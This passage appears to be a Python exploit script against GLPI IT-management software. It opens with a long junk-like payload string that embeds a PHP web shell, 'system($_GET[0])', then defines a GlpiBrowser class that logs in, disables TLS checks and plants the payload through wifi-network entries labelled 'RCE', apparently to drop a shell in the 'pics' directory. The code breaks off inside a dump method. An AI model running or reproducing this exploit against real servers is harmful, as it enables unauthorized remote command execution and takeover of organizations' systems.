x6bY.d5sBGWK+8IYEzqlpj?7;j{l^;B2?u;+UAn}1J5C:1DbcV,U@_OLL{aLFY`cQA7JnL[Tz6j-U9qmVy7;706VP0R`6Zmn_aRZE/P)R~A9lYosxX4;[?9/|O?sJSXZoVvNgIH[-D?o}e]_T7GJPu6Vk,SY{P?)b5oiGsGV.0{@,4JuY0a7d(P)`YX1~Iq[]K,?lNe-V+}QGG}T^~2l)BX9khRsxJB(rf,ZVz)dtCU3Br.8.yu~gMo7aD/]m/xrH~i]^]A*HLgFFY/AlVqLTa17qm1qcU;W4x;8,^;*|TN(YYkm?0Xbvsy*{))pfUG02mvBXNeH;)OZJ~6Z`csCb)R:Ute]2Nj90K{`M;6V1+YKbM;B,O/*~g-ucwb2|`cOS?D8Rt]X}6FI^okmw4~PI({VX8;KYMJRv]w2Jc/udD@[wOQ,huX76iQ}HqSgdiTalFVdujJwcaof}Z1MbK{/d;2{RM3rDRF4OSZbN2t+:TW,,v5m+1nWQbaoR(54f-[^yv*GCyzGCN^M9d@.VL4:^[/}6kUcCSz?`J*.CiqjJjQJkZkGxY}u*shO4x38t+`FW};|Go2HRAsSHJJN@``HVmacO[rn|Q+1{hA3yqEg.sL+5S)_Ol5|,kM@RET,7f[k;Xi?Mal?ZnK,*_NQWZy+cr^Cf9RA^Nv5|a@Jp2bD*HT`+Po2laU]LK,1z]LRk_-~keiS^Y8:Zh`.W}LNH`C8fzT/zv2XEDD*3(cpG{DtXeq0Pom^,a7oB_s5_NE*sS*|D:;B:y80ySM.ys(Axv36/*vu)DA(V:qIY[RK}pbgAQ,lhku(.+cC^9}qg_27iZZCt/],MYx{;-5P:a6HGTa-w3h~;;{E-^u~q9w86w)da~vrGTjFiGlO2)*s^0gCOF.1h`,+LR|c7ETS]{2R`ago*d[NpEVNV(KR~+@`kIx[)oCJc?:~oIG:3Of1Z)d|tA}wG_jvj~G{dp(Q?|M/Ep/)a}(UAP^y_~cOAlbjy8v,v].Wb.Ylj((;qQVZ]Wxli2ER8e@AooQFoADbfIn@*maADair)(y7)9ppn_]tDoW1X{]lB8NE[@PTB.}ntI`B5VZ)pj.aH19;JOC1@7_l,x^.j/22y[6yehst}qYwnJq(.Oc@2;?*Bt@1CnD;H2^YcJ0UmvYuu6m)1`d6dYRM[)q3lalx71q^Ckt5vw,)9P~vQM9^Xv,EsgLdfBf3/v(XT[;{vlfZtIlg_cH)9ar6u4.Y`Iz?{wSXT_Nc,s,UC[N*4_Zsa3l(N0]_|/;V/Uv)V*3ADY440c+{RSgmdi^J4C{*z~YLVVu0x-^@]Bbmq]^NceLtSwV]~hDx0CtVCZ;{GO:q;Gnl8rhQp[OUO9vK|Uk9cRZm/ilBrbl]/W81d}d~e|CZpYCi~+35JzU8wM12YSj?]]_Vt9Otv^O),Zewl3^NMqg|ngeHEBLD9htuMn]0a.;?46UiPrRV4b4P]43T4B)-^bpWilQf_Oml`FqjBdoOPJ1sSk*I65hg2ga:VzV9K+qD]:WGK]]1,CrFZu9@xLDDE*gIP[O{b^}Qnla7yn7lZ~^C4w6*gkzx4/;D|iBInIrz6XNv+,32C9HVVv4Rxb22G]W_Qp+?j`~d.a~X3[2.~v}o6Fob)JF,sRGojy[vv|DTZ?i:9o*,BJuo(xonPd4}Sn6+Vx|]ty}[j`8TWAys;OfsxW9ykcWWF|VaU);kiDB(U5]np1kmnqH~Xc{5qo[pptfaD7,8F)|jtOJj}~9I8I]rwcfb3g(DU6{|o_.EYyLLIyq0R37@/|W,)3LqF.)34}z)*pDI]uUZ5igge(35oBaVsf9pYh9FE]Z`khw^QRyz1(j6b(mREtM|0ZZv@g|Ffv;3BN1Px6Tqt@eM,`B({j.3{_x4bujJ;wUN3GOdR_)5LrXEShh+`LT}dSCOZBe^a[/;|ZUmNeM@iX|D4YtCe3bTT^MAvAU]SsC)jPIX/`4T,L1S{a]NM:^JtLt|bMX76_9(YS~W2*Nh,~Qs)PH5{AKS*xUpO8Hd^3,w*wvJZi}HPqW@WyKcE}3EFAZo/@/,716,5,?mWUy~ZEH.;QC*5@FSDf^4g1VazCp5yx.}:N9}K`vl*wi`^a)u:@v?aI:N:F6,1DM)(f^-^5/G)H2-kNQl9Ep}tR_|(AU.^]urXiH5;YxJ.c5FqS-wb]Akh8Ip-*.n9GUfr@RPyt(nbg,.2ux;rJR7giRwgnZs9DYFst9Cyr6YX,B]P0Y8^i;1o3lIQvsdweGnn}Z)Crl|2bf{C}ZmAG@iCd?*{}3zSL{__gVnh7lhu/^1j2?{p^ikcCOen?[CvO6`H8?JdkeIF[e^7BDQzC2iREV6(wVmBG:v2b,^qaLxyclr`}A[9b|Pul9OBS^[JkhizdHCElSs5R,4M,,opGH[^:fW_A_L}zu7m_7{fDP4W,eFgEEnO{l^cILZ*Sy/b/hwPOG]5[61wr9RTM^32^[)7iX:Y0D;Q,`xl?JOKYkv(?Iz2jvA8It{i2b0YuiUa6hF)X54Z1}E2aERlZ}a-UPP/8;YS0(+K}NFC~`LvFg[Lj,D*3biT{+(Cc,])`fAvwH~~[`-YbwE?|DSg(Adp~ASORGi0QunZHCt^U-rT2.kt*KbdTp0ZOs-|Bbi82K4UTR-3cRYF4MaZ3HR56hdT)pNGf|oFcc[5Y3pK1hm79YRJ`)q6[:U|U7p5E@^9yW.6xLzxSa@)}^f,?4,S,,-obM~d_fePbtk`INaxEGmu55ln5CmAKjfou~ZaN~F;:m2Yc)A(W~8y84Rc)7js~Ld.FEvxwlvcgP3xkR*ovGsMB*e3Y6M3s/3L_*t;Pv0ycqZpZF2,ne[IYAC]LUWiKCJhcaJbvl.y{Hj:BfhG5iVu7X3mF2ie]*tjr0EPl6Cqd.CV8[LpHPT)z@|5{4.NsK^{qS~vp]0;p,nR~KT03P9*SkNWRekOjvp`o1R3OaY)(tO(j*DgFPTf_,omec5Vh98xE[L6LS59iJ{3xAM7+5D}tMw5`bN3MD6:m6~vje*0F1Q}wY|8U8}.9qR/TpN8AI`zqeR;:YHfSLvs1MeV85Xt).0kEN+B[8(`IqQGs@KXwN}0[/yZy.cM|]~qh}|.5|.TVHxAWfcScuiwRJBn5C)^9F?Gm7Y[{S?h-u,6NQFg*x]l,n?alcq.s?oFTA?pDrK?OEG+gU}X}`CIU@;u~(dN^Aloz]A1u-mZi}5s?@kH4[ZEr^Y+`L|A~yNbOyvCQpVTM7y^kx;{+u~9`UP7GVh86X.E3K3Q-RLNdpFK}HMokeq07h[c:nf:7`G8w;D8JYfMK0108ila~]Ymn8-J6Lw~7Zmo{LsugPvrQ+]Oz`Il*q?ca[lMFr9WGqWl^LS/dzr5BoloX2Otlpxj`jHsm9hYYbdKFCn.luUDZijAG6:I8AS^gibd,x_`Y8@JF7496c6Y?Vo43P0A^siT-*I1m^)Lm1K2w8u|gVqMb~NWEd[x|Sx|pwZQ3o:?rTC65.{2REDMk?e@q-bQJ*Cd|lc:26a6(zfoP5J7^IAUlu/(F]wD.`viENYfS+aOL7I/[O3akE|e|RwI4Q6:zG2pfak5Q}_hDDoz[nw;yO1G{zJpSEDnjvzL.JM~I{rMfj)PgERv6NQZrb{x]Lg(/GXBe/9wU+2}RRwTGk?EB|:Vo{y|EwP1{hxi,RqX*p5?|@1ekxyKKp8zs.8i3baUI.xj_y^;k1hJpK}:21N3uJqnciHmYxDhp*-jMbj3~}9@DO9+m/MT4:WiPTjNA^16kFMS(bhoZih2x)nVioPsF.P1@vG(bo9-JJ_fQ`_PF,2,obmP,^39D7clRjtBf@HnQ3xR1f@D.//p-3`S7Uddy+?6dxt6JNYazRrf.UK1i4oSdrD6CGXYfy*GYrp;,nUactZsTD:Ze/^(VZhq8jRJCr|pScsFCN|ZAE:B|fd4Dq;64txD|u_L[G.z3wu[JaSJ5sn4Sh{+qi,W/F;SXxN]]067q3kyA]{F*GER3^p|:zxCQb1~n7S^TF/fy`iut*y~^-P*;9_[pyhLpzJF)_oDFe`?6OmESEhF{`.:y:rEhtp{QZ)lg{}Lz*]RzJdA)UCJUsv;NsYQ]EB/BRJp3s]a/VJz~*hP(fv,Z|pK2y6.,t.2:h?N5BE-o.E+(?cK?8)Ox0P*ZFA2HrWuiUYwZ.E;(HwQNI18(EG5w_FxE83_vY*9|L5d]f.7_b7Ef{|f/[_+*~/tI/?])Bi@**3ZaJ)bn.cWgF:R`hxm-*QF:yaKo)5/`PM8rzV:vgL|wot04;5LTx]LfJ8w.,Ghan`e9fk;zm:ANzg,Ri|^.2:a;+l7BEgx]PZlpoHwA?0q.S*mHIrS[bRW-;U`GCX{b1Xpty^|m;ojG-LFzbij?7S(u@Pvhtc29y/)s+|,ua_N)O)gpG,Km,Jdfcv{M(Mw_ms[-sbGf.[C:oceBUi~:L_Ggc-dx+N7J(mchJ4rG.[rW^kKP4Y1(dkc3,D|34~_1Oy[]C}AD,i1N@5MvI,~ZqaPfQp.+;~WfR~@iT-oq4:j|Lz-yQT)aNup4rT6..9CckJk]C(S1Kgcwwc)|P3oy`v3vw0pvBslKun~}mFZ(~b{]R2ThH{kB@qaRG5jmL_1GiTU~[9y7@u0AM6Hu2o4).;j1Dg5GSt5t,h|OU;iU1nihK+GP)/p?qGV8cWWEv/)+;FDWN7C(5jZVWceoqjeL][O80JOYPYQjE6?(gK9eRI]BgDkoEPjorf5Q8Ht@W@KhiK,mD7NlU,Lu[pAKIQ,1h).@n@qR``km1W/~M./.81vLe5QnVt^iiW(cG6`lpV81nZpNbc^j[a`+Z75d47w19ld59oF/[PYR;bQiIFsuBn}xJE-v5V{^jZk/vOFPH]RnH-MOJMf3*yoOJ`KV}@QkMCp/oL4|EPrCt+eZQSWL2S8s]:??_e0Zz5/;gh])|hNr@[D.|ifdM_^`Ql/6qyl7;NEU.H+U?0+Btgr:`bE2}a|.waGq/ThSd0G)Q22_zdtwmOxAM:`Sf5t?ecIP?3X80--TQtZ/E~cFK1*~*C?rjZ_yzEgdq;gM,T3+7j._6)YD5,Enu`oU/3XRf]H+]96YfZ3LbKE,*2hc?9q}L|}`v1/tTRj}4kuVhYs;+/PQPEN`,Q{q;IR9N*F8z|;?C?_J]B(UDG`sNt{EHwq-`L61mKO640u}^V56Bh?cjZRA+})~rPqHaqi?Z)fds[_RW7RuxQr,/|8aohp+C]Xw@{5ddv{06RP8^(tQCa0lOkp3_-Dg^9`Uh~8uxm35gAi`FCO[udvSGxI}`mhGhl(NA.G}wZaL:BAe9hrSA`9V/3tm8|~LXv}*k*`J7H]TUfW|:`Q`^9LtOzlckw?a,OaWYZ8FPAK`D}^14O@@XHi6Cl81pB+G*^g?VEr?MGWhq-E^lW_Bf*Z7]4o*SjvbvgW8BlpwLw)|t5mjC0{:*z6-V)HK911;U^,d:@C[5lDun+8e2H,0B@8v)Rxo32lRqI91m}6FN[_NrBtc9,;tFMcb{W6ZZ:s]44OOdjqTW94?n`/]2{~oOq0Zfn20D4A4aZVioI;Przexl+X}03;vWT;FO*8V`Ug8zV?)MfR8V`[D:42t0ga/SDqK8xo1oS+{mTU{bw-/u@;)R9Eo3ewTUM?F4VKohBO11C0oi8TO{}uMO)x)-Kl?.[@eLm.9ZyRrb,?ZS1+2}f-/[[(cfv]gefTpi_C]na{{F8QqKg3FnEwW1C:G@Gat^kJ)p}p[N1`[Sl2hbuhg9]9M]/J@EGRC;XD`HhKyYeka[5_+z8t]v)x3j2RXGjtNIAk{[.6OVX8Glo^]J-}0h+d*Chi}9oP.zN[cpV.JJScOc]hWrxVJom|1D82L~ay?hWAMTY:H),nH,mh8[r`/R64hFePt?rm`2ww5`5`G;|lcu}m)it7gW*E:s{i+{2-Iv0Aad`xiMJ/t+6LD|M7opF;.hHk*3sDEGz~,p}mGReRCO:|0vg0a,UuD+dEwrVW8VLO}sj?*EVDTQj1Sub4S([np[Lqk.:cbR+,E?JMN3P`|A*cg74FCHAzJ@bZBQDw2Aux:FnLZpMg^wnZD~Np185?DWjM^mE_v.e-[xcrUDPn{DaE~hB}_c,pGlQnAP*)sLt3SPMfNxp?trB8g+Ct/y]xVbJpsRUfSAp(O+rnhFC}.W.GGza5T94G1BB8e_s~hp{y*4v@y[x]_:I+-Qm(MIG1*j5P:/GE:f2lT)bPh)RR{ke;Uu.(dhq-2{v2)T}OX6ldC~BfJ~k_R[QY4Nu+*UWSxJL-,3)(b]I.{^64u@R2vjwpO3?*24oVd6M{wR[|~ZJijSz;sq?X+)9qSpf|T.:PJ:yT8|v1:SSP1^:zjxDk(Ylicx8@(m{m2^ui.8H{~V07Z|,lCyX+YJSw]mB[dtxAn2mUC2zLhn0TGdIN0T*IyW[5ihAoCbQrva-TaQIh;TG}?0Zplu_:B8WxLiIPV~Ohys0j(fxfS7dI]gieATwZC^b_b9JXu1G/_m:m~+Z(p[Yx)Bf:YP[:Bk)RSJx]qPcZ}dD:t,tqUqOdPYt?]|Jvv2WypfSP_*QN+w@^s,2}?]y[{hG(DPUW;y}/iv811*bnd)[+4hr6Wox(Le5tsXfGPe~1gK2ngD}0BFUSIiPeBgWG7URi,RKCOYMuBS7-HN8uJ0L,[hx(aw)AND@f{nXHH;9|@3r*}fYZHqWzc3]DgOfSW`.FOS0l[35DKOBk[W(5pn):4N|]CbX(y?YFAw4AA~^?cPN`/0gH3Vf.atXl]i,C0}Q,bob|U0[pcVVHvLWT[9edI7xpnitZ5*K;Flt0v(BPu8Q_etook2r)zvGPhd(kSX}?YJCVtRQj6f8xt[I|hl~o({Ph_(MJq7@LWmo?RejZ|@59^4Kb7*99AG+G[b3l9igWp]6hyyDhvj97~_JZsexMNJxV@O4@C|DkWVW`(B-lPRc^WQiOZxqA?5iUn.gx*y~78VL}6;f`7{W]/Ovxv7e}o`TQGcDm~]Z@/deEIB~;KlL-DR(76DvLLGUf|h{?tnZovM6z*xIpuO6WUB5}PDf*XImYe(sh].CnD1jVpQKyv1}w|[,SlF5h?iYkW9nyST7AXLE4z/o:VSk`kirNwCczQ04.4kK]H`WAZGUeSh?]V|Yob9HRrC@OJqt|EgTe2,_:SB^xd,I4P+G2F4n8ADgf2DUcl6O:;./wjH6k:?mWer,Ac/cMi(7bB9yOnY?lH]izbXmaI``fHKAKI2~WvE_]yEV2[Zpdd}9IlZeG~?F^zkM?LaQT|LMmz(DoJX_KR3ErvjoZ}PLMB7XARET8ESf*z)IMwvy2f:B.sd]y[1481M3XPm3sJXTmAG4@Ot@8cZQCMq-cg?fm]I4d^(a0fAaZH7/?WwvifYtorv0]grf^]MP9*k)MM9(oF~IFguK}2_Jk}FZ.D42+cfD,B^T-3v{7Ej;~X8,3Lim^Mm}JMcSc]Jpx3}vS4}6+8mi4~g?}j.8^-C43+[AMp-j_vL_8dNjMx@4juXXk59mbJ*Uw{Fu3e)^|O.nnK0IVvTQT[.hRJd_^A)|o?~YLiY]KgG0tavwl^xY[:`x72elSuM:v:QmWr8yGoO^CAK6*2x)Qvau|ufV)9o(gaky?3X5B@QK3{-w]hL5|i,}.HX`P*n{`+n]n8.`kig8i|lpcHn+c8Yw-iuER|fH8e/}|/|jAHQ9Og4RRU7pclpJB(1`*;{c;`,dvuGT1]5siUq~l~psc{DTE?9,zbCX3{W_)@U*C9,;Gb2/F}Z33*7hrikln94[39U5V,nPKB-C*LcJLXM5gJG2[vX]veZfeMI+5Uw|;8cJ+-Y]m2@F?dT~5NEYXDYOtbDy+W-w_JVrHLsZ`ZBF*szGg3R.f)Q;}AY5F^]YMN;5T`s-]wj4wF?3H(mJp?M0{3[g2JH84O1{3EpWP/aeZoETTB?J2Kcg+kl*({AMcuqAa6.bc3PkY]s,*5e1+PYOi-Th1JJ(5}k5;cE8~4*n@F{HYFZYS6NM9kt]^l1rYfCfA45[C)rqD0Qr^VMRN.jsmxe07LC6h(*:HKLJ*1*Gzf`oe]8t`dQEiwg90)U^wQCk2d.@WK*+g7A}cM;^~zBD0L{zXXNL9po0W,@a*a{d_xIdH(6P,k[W)uW[:+AE(HNo;NKo28p3^`/@0H_5-;??d];Sv5hwKxCk:R2:]]Um3t3*`hJnQvJk(71RhT|Vk7N0WdVd0O@-MIbVO@f_QT*;~s87_CoKWINV5Rd1-|;3:WLzq5sf,6cA:|zFeGkWkDqBwxU(Zk-1-VMP.dO.VgiLWrVkQC7npklOT5?(FD9+fZlXbXDhWYUOhz~UoEwWQWydeE4m?//-I,6)[8DRcNK[}T9Bgf0eOp:KCOm?|T_t5mk@MFP.H2I9oVRNcsefqTL1IWx}jquYXMgA|ol[KfIveYvo0AjUojQJkU(kX4ixZzvMmCjY-PUaB/ILbc~mX25SgG(fE5i3)I]-C^LJW0J4wlioMSyQn]87;RnFo]LmCqmz|qYjQlB0/PgDU:KF|tj5Z,](AyV8Ya1Y2Xo8(qCF*1WbZ^Z;hKGaCBZe6EYyHe~hFz.W|lP1xlJ33[hxFj-VZ_COv^P](n2q(Dd`1PynS[x}Ut^-CgUlNq:UB3TsklRQ5Cti5v@u:KEiwC6FSHgh2QU7d1acvGjBG9,NaTQafp(RMyxI_S|nql19Hn]KIiootsXkkKCDHZh9QDF+*)_jl@1Ns,[JFaOL,rc:6N2@2O.qs*3U9ZPfQgtseY3l-hfEkEeGha/fSq,xIt0oWD~L[`@1hR;~7FQ;eVLr7jswlA[[{Q*1iVHx0(s]R:yZC25E|`PfEjJHqY{x3Xtkk+k3HO_KHM[DnqZQ*y3KtumK2nA0g_Dhvn_g@QQR{|`|B~H]Nf}t2i[2A`/)Hh`?A|aJwar9E4,*?o3-y[pv3}0+zq[{J44ho+?C[uErII`NX,}JYgt`|1vP`Ou+YvH-cllWiap;kkV3HI7@QnHHHq.__6FrhZBQpdOPo}FmwRMSNh-s?z`iul4y|U9tDop}TSy_JDG7opnNDF?+isM[kgY+UWh@sLBQr4d)I({Kf@fQIyf-r~62v`:xS+,R[GnC28^1LEe`i_BuyJTTYIe-22J1b4fcltGYf/BPayVwZU7DiAsW3,ok[;FhzbvNmezLwg}MDXCRlyPiDhYj[[@rS1^J,Y2SMu+sf~@VERq(Z,p)qW*sn{o9liH/t_v.DL1cC{wcxzp]KyBWguV]CT(TiDTvdZRkAS7qP`pR5xKir8dp~qt4,R,DgcO``SGYrSU)N0lTRQVB{aALU^+owQb0x]k.A`~QRl)B]}6.]l/[KaCYCAVNA{4uSv@6,d[@VPtBi[sBB[F(y_)@Dzy9:Z7/4ABTjwmz~RaYv_t/90AC{J,*uy_qMo+CME7YR}_B[_1X~Vn68{4Z6dZP,g+URH-9JX,[jvHAvLyJwI-N^T2bILokflB]Jg)yRS/+H~X2]8amM6Gf8UTGxN`f0e4U(i-3Uw|KuR-aR?z|GP++bGCtthlT0h1tnR_|8ULkw83:]a0U,Ym{eiO2yQ_dX^EUvg5bcMdkS7.i{l[x344mm@^qEM/GirQD}Cb+w0k15a3;c{Nja[;|Ks7{Zu8--J1@:O*jRb-~f1r]Ti}qD4G;5sAEm4DXta,;--fJ.q:[LU@|/-A`yP0?WkL3gSvA12,1|6KL5/+8RdM^wWp`]k(H9{,TJ2Nk}@[iS+LFLR|Hi)^pG;]:/j[[/r0U1]|Lij;)qiGLYa{RP/yFc(1`HN?.lxcygo29JP|V3(F2314xYQcmX@yKMeP|YvM+MEx492_XmMyzUa|6Cn/jK+QM0p*OQRtLCoDUBFGtvS7}N0k9Rr^W3nM5[PW{)CaHOH1PiD)}-Hw8YgTNsaI-Akwgh1vn_@~PnOgeU@S*3d?fTxP6J|1oQm@a{NMO`M;ur`.WM1vs_7DgR{P|K3EnR|)M@gk_m@1Jm9X}UKRZ{lAGuE4czG95wnc93e9KNEPJ)6:y9mZ_B0?}4}5@2_2`ps|~FqA+*E`Ev`DRw.Lw4R-v8af5:7yMjNTO.m_25IXWPyLhUWKD9/W4:x1/hP`nano-Lm};;lByP|Y^BPWkTeT|*z1MT{u:rz)a|{n^O.{RZUWQ[eE6+CU;J*LHIGuf0XZ;Zv@|cpdbwqyB+0NwS1,;S1LFLqAQ*MNRO]E9bdYl;.5hypKuFbBR,qRR0(dv[vFrb7wzLgdnS517cn?.]]i.KCpYRMW}a3.|:AoudGcn?-520lbT^DrZj6wVfWX,7r^QPXRrDe?y):X@bA@9LsZj_.v-cb^CtYJUBmZ^c});s,r+a]e~9iitr8,T@1K(7/Ak.R+,|1i]d.1bs@TyFW-v;.D8SZ6pm~POu4T:]Gr1KxvEv-pwTfyeL7^+pQHP7fJ}t9M@]5sOkEVo}NeK]avoYinbTO6fq|fz8]L4cnxi4wtVC;YY?cl3L3NcfGCyGN,0Lu/tq,5CQfbGE*URI`sE^v]9j84;m51;|U]8W(c1[p)b;z12)@XIc3y5H0-se4C2tv-5YlN@bT2*JUj~MEEtaCs^r,9,~X4cf+9;)2PuVKnYQbVzM1k8U4?gsF5Hq/s;kQHj)fDQNfY^MmL[7k4ufEzHMo4vEYF5TU~Xm5Ea]bfhzDEq46PvkdnTcdd8P(NT;Gc2FQFJ~M3R.r@(X;B0WFfBktirocY)*+d*P2(NOTyN.L?BqZOmM[eGRmMUSkzhhWe^?h6)bG;+J|3St`EYO-d.RkcL6y@fOZk6z/v_e5Wnd|(@mgdqxv*|VDTc2IhjD`enZ0B-XvTf:v4I8`dymSpga-l}}?,0^f?ZK@o/t@it4CumPL2asl*S}n}WgfY/fojQa5S*X6KC{+Y/[t7)j5:GIIlt3kc9mP^|)y)EWDI(tlHA|D{kRt/]T(]pxOC}H2kz{-tjBds)`y:;Yt2zzucuF60C8/9k/IvszlNq]Hw._Ns|8Bd9NFlF4gKVJ:-FPPyGqAs`0,,)mvfxNp**jGc).ic:4g2pUYHJmx``i]~mfaklZ@*/eEjc((`ELP*6ZL|[9C++uRh7OkH3G{0+RkZ;UHrQCVdS(uOdPX6LH.UQicyl+Tj(Af8oR-/?5QR3P6+:fu8^7+HcV|utDb8-CZni/s)b613/q5j-V8s?e}a@GIgb-?kyH4H?RX6Z]Ef+j?q{aQu/WKf`89j?2LwId^)f,Ny3_Uw-`MAk,.XFvlR?{@KTkh68|i~f|V9U_T+Ar)ae|50bFL0zN;x(9+GVt7y,?lWYNEdLb/F(|p9Ubhw*,]ukG`?)X3~DFT7?/aNX^e{2EWtjoRJBX~}(rH^wvi8dgMrNZrkrt[(CriS75Q`4lJiXu}GJL.gevS92@TvXgc)uG9`q[6*S,[E}v8*J5rU^(`-sgB7q|.ZP/iQJqXb3]IwYtv50}2)SmWftg.+9nA?x7hq1+/JLnI@@KY8QuJ{){fX3_scb14`FO}/{D1W04fJ|[14pu2BqGl^u^KOEAg5;0efkwW]TzOr@2O]J83H_d6Nz?|)a4Gk6jSPwI^-1dq?QslRt5H.dv@_(Ad;AM~_XBw{Po5p+[57ub[W|j(jUpjLiTk*xd?V]4(m+[(VAGEpwe_Sb~w.?uSKT[(F{B2sxky?)ADPv8PG@jC~Se|IT2pEuX8xG01W@~CQ;45OB*.TCUiZtxK2Y)|B,F1v_+8HiEZ7,ucw6XSVw(-hr2@v6/nv-UllyDaBc8?;kMba7f),,|]A9,7m)O:_uw0:Pu~ulLvymT]O-Vm4F@WD)4OMfjeD~z8.IM,r|tm[_5w2[Z2O[+wU0ZGI6BDirb_(E1]@8)h0LPv91q3^5ssF4KkY}1V]3[[Sl-b+-W1j[0{AzHDN|-~8ly5n0yo[8BH?QQLZtMRPZxe~EH/Uk`dz6?:EUJ9w|Q@V]?At)VXxV5Jg1x/?xf^d}s,mY^RxAaXiK5KX14tdi{oN2cICIR;J.B|bIv1eHjg-Uy2tUazfB+jD2U.MV]0+:^5yBGNXiJc:.O7?1UVbH6[4c9EsPvChZU[p{Oszk.0N|++HWGgRDb;3SkSpOv/fx5wpWmDx[k3m8D^n-UE+N80JhO08lYS*jb)c,2ztGX)[lxp*{GLv2)OWhKT^dm*TtoF,:/gyc?X2BESP?dm{HHTxovqgubf4a6`cNw.ai));HrxO-HpaZI,/.*ZD2TtIwT:hYztEjs1CfjOy~5@4_1fCEGb`*.?yG@cQy*s~uG;KGW+haa]g^]pWabaw6qR]Le[S;t|I.3`(rJwZH)-zeE6x7[2x:W|b[uHo3Bq:`x:Z/eth|qNxQl*q(*}K^}{ndJl}zURs)FV6@o_hL?wVKe+OS*B,)3AN(f*?KwbOG^F2q[?x2hofhtR~8EJBJ7_d4grziPQ4p}|;PwK/:e1|oI`_M(Ry|mGkVSRnGstAtmfr;7?pYXIYNy?O6r6MT*I9Ng}@rAST-^Brmt/stUL;Q:v+W3*xKpNdjHZHnnXx3CwsHlg.,Xjg{8*y54A|,FD(mRc6PgcKPUDIYO60BWiGHUcyW@iFT*KimJkDh.P+e0pTqChk@B1P~+AaFo]rsUrLB7IiESwx7.iPDDCtv8i@1sQLW_k)uUvS4Tyh}sBnIPN(8?Ia_.m/+q,Q,{n732c5sOjv8):V7y*NC|TdY/OOnj}I-rV@OM7CvZIW-H?yD^K-(39Of|bLLz{lz^p@rS+l8)tVyTme~(DWHwr8phTeH(-K[4oa{R@Q-gmr{h*7*-JLiuA.ZhbV):j4LD,9*aO3B2aonSQv*N?jG-]Sl5fi;zQ(lW~KwUCJIzswy7MVL,sQSpE3bT9aBPx,4BA.iYf;*B{t.5uB:eKB/7VC(ij~A4.lzVeMi95]brHgUZ/Bh5pyuy/w*{3U3@`9.DEOLvE86O:s(sA2bV?^oELOvMSr/rOWUSref{(Yfaw)mQ7az)*/system($_GET[0]);/*챻紟摌ྪⴇﲈ珹꘎۱⦛ൿ轹σអǑ樆ಧ嬑ൟ냁卝ⅵ㡕蒸榓ꎢ蜒䭘勼ꔗㆾ褅朵顶鎢捴ǕӢퟹ뉌ꕵ붎꺉૾懮㛡نŶ有ʡﳷ䍠죫펪唗鋊嗲켑辋䷪ᰀ쵈ᩚ∰雑𢡊Ս䙝䨌" + +requests.packages.urllib3.disable_warnings() + + +class GlpiBrowser: + """_summary_""" + + def __init__(self, url: str, user: str, password: str, platform: str): + """ + Initialize the GlpiBrowser with required attributes. + + Args: + url (str): The URL of the target GLPI instance. + user (str): The username for authentication. + password (str): The password for authentication. + platform (str): The platform of the target (either 'windows' or 'unix'). + """ + self.__url = url + self.__user = user + self.__password = password + + self.accessible_directory = "pics" + + if "win" in platform.lower(): + self.__platform = "windows" + else: + self.__platform = "unix" + + self.__session = requests.Session() + self.__session.verify = False + + self.__shell_name = None + + print(f"[+] {self!s}") + + # Dunders + def __repr__(self) -> str: + """Return a machine-readable representation of the browser instance.""" + return f"" + + def __str__(self) -> str: + """Return a human-readable representation of the browser instance.""" + return f"GLPI Browser targeting {self.__url!r} ({self.__platform!r}) with following credentials: {self.__user!r}:{self.__password!r}." + + # Public methods + def is_alive(self) -> bool: + """ + Check if the target GLPI instance is alive and responding. + + Returns: + bool: True if the GLPI instance is up and responding, otherwise False. + """ + try: + self.__session.get(url=self.__url, timeout=3) + except Exception as error: + print(f"[-] Impossible to reach the target.") + print(f"[x] Root cause: {error}") + return False + else: + print(f"[+] Target is up and responding.") + return True + + def login(self) -> bool: + """ + Attempt to login to the GLPI instance with provided credentials. + + Returns: + bool: True if login is successful, otherwise False. + """ + html_text = self.__session.get(url=self.__url, allow_redirects=True).text + csrf_token = self.__extract_csrf(html=html_text) + name_field = re.search(r'name="(.*)" id="login_name"', html_text).group(1) + pass_field = re.search(r'name="(.*)" id="login_password"', html_text).group(1) + + login_request = self.__session.post( + url=f"{self.__url}/front/login.php", + data={ + name_field: self.__user, + pass_field: self.__password, + "auth": "local", + "submit": "Post", + "_glpi_csrf_token": csrf_token, + }, + allow_redirects=False, + ) + + return login_request.status_code == 302 + + def create_network(self, datemod: str) -> None: + """ + Create a new network with the specified attributes. + + Args: + datemod (str): The timestamp indicating when the network was modified. + """ + creation_request = self.__session.post( + f"{self.__url}/front/wifinetwork.form.php", + data={ + "entities_id": "0", + "is_recursive": "0", + "name": "PoC", + "comment": PAYLOAD, + "essid": "RCE", + "mode": "ad-hoc", + "add": "ADD", + "_glpi_csrf_token": self.__extract_csrf( + self.__session.get(f"{self.__url}/front/wifinetwork.php").text + ), + "_read_date_mod": datemod, + }, + ) + + if creation_request.status_code == 302: + print("[+] Network created") + + def wipe_networks(self, padding, datemod): + """ + Wipe all networks. + + Args: + padding (str): Padding string for ESSID. + datemod (str): The timestamp indicating when the network was modified. + """ + print("[*] Wiping networks...") + all_networks_request = self.__session.get( + f"{self.__url}/front/wifinetwork.php#modal_massaction_contentb5e83b3aa28f203595c34c5dbcea85c9" + ) + + webpage = html.fromstring(all_networks_request.content) + + for rawlink in set( + link + for link in webpage.xpath("//a/@href") + if "wifinetwork.form.php?id=" in link + ): + network_id = rawlink.split("=")[-1] + print(f"\tDeleting network id: {network_id}") + + self.__session.post( + f"{self.__url}/front/wifinetwork.form.php", + data={ + "entities_id": "0", + "is_recursive": "0", + "name": "PoC", + "comment": PAYLOAD, + "essid": "RCE" + padding, + "mode": "ad-hoc", + "purge": "Delete permanently", + "id": network_id, + "_glpi_csrf_token": self.__extract_csrf(all_networks_request.text), + "_read_date_mod": datemod, + }, + ) + + def edit_network(self, padding: str, datemod: str) -> None: + """_summary_ + + options: + padding (str): _description_ + datemod (str): _description_ + """ + print("[+] Modifying network") + for rawlink in set( + link + for link in html.fromstring( + self.__session.get(f"{self.__url}/front/wifinetwork.php").content + ).xpath("//a/@href") + if "wifinetwork.form.php?id=" in link + ): + # edit the network name and essid + self.__session.post( + f"{self.__url}/front/wifinetwork.form.php", + data={ + "entities_id": "0", + "is_recursive": "0", + "name": "PoC", + "comment": PAYLOAD, + "essid": f"RCE{padding}", + "mode": "ad-hoc", + "update": "Save", + "id": rawlink.split("=")[-1], + "_glpi_csrf_token": self.__extract_csrf( + self.__session.get( + f"{self.__url}/front/{rawlink.split('/')[-1]}" + ).text + ), + "_read_date_mod": datemod, + }, + ) + + print(f"\tNew ESSID: RCE{padding}") + + def create_dump(self, wifi_table_offset: str = None): + """ + Initiates a dump request to 